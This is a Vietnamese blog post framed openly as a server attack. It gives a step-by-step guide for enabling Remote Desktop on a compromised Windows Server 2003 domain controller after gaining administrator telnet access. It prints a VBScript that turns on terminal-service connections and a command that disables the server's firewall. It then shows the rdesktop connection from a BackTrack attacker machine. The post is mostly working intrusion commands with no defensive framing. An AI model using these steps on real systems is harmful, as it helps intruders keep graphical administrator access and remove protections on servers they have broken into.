J2TEAM Security: A must-have extension for Chrome users. Install now!

BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA

Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.
Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3
B1. Trên Server kiểm tra remote desktop chưa bật.
picture001
B2. Trên máy Attacker, telnet vào Server
picture002
B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop
picture003
Nội dung file VBScript remote.vbs

machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ‘ 0=off, 1=on set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )
for each item in items
item.SetAllowTSConnections( value_to_set )
next
B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.
picture004
B5. Dùng lệnh dir kiểm tra
picture005
B6. Chạy file remote.vbs để bật remote desktop.
picture006
B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)
picture007
B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật
picture008
B9. Tắt firewall của Server
Sử dụng lệnh : Netsh firewall set opmode disable
picture009
B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.
Sử dụng lệnh rdesktop [hostname]
picture010
B11. Nhập username/password của Administrator
picture011
B12. Truy cập thành công với quyền Administrators
picture012
Have a nice day smile_wink
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!